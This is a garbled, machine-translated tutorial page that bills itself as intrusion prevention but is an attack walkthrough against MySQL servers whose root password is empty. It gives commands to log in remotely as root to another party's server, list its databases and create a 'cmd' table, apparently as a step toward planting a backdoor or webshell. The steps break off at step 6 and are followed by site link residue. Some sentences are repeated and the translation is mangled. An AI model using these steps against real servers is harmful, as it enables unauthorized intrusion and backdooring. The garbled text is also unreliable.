How to prevent intrusion: MySQL attack methods Daquan _ PHP Tutorial

How to prevent intrusion: MySQL attack methods. When the ROOT password of a MYSQL User is empty, it is a major vulnerability. There are also many methods on the internet to exploit this vulnerability. generally, it is difficult to write an ASP or PHP backdoor, and also MYSQLWhen the user's ROOT password is empty, it is a very large vulnerability. There are also many methods on the internet to exploit this vulnerability, usually by writing an ASP or PHPWebshells are not only troublesome, but also need to guess the Directory of the website. if the other party does not open IIS, then we can't help it ??

Later, I thought about a solution and succeeded in testing several servers with this vulnerability. The attack methods are published as follows:

1. connect to the MYSQL server of the other party

Mysql-u root-h 192.168.0.1

Mysql.exe this program is in the BIN directory where you have installed MYSQL

2. let's take a look at some databases on the server.

Mysql> show databases;

By default, MYSQL and TEST databases are installed. if you see other databases, they are user-created databases.

3. let's enter the database

Mysql> use test;

We will enter the test database.

4. check the data tables in the database.

Mysql> show tables;

By default, no table exists in test.

The following are key parts:

5. create a new table under the TEST database;

Mysql> create table a (cmd text );

Now, we have created a new table named a, which stores only one field, the field name is cmd, and the text is text.

6. insert content into the table

Http://www.bkjia.com/PHPjc/631041.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/631041.htmlTechArticleMYSQL user ROOT password is empty is a very large vulnerability, there are also a lot of methods to exploit this vulnerability on the Internet, is generally to write an ASP or PHP backdoor, not only very troublesome, and...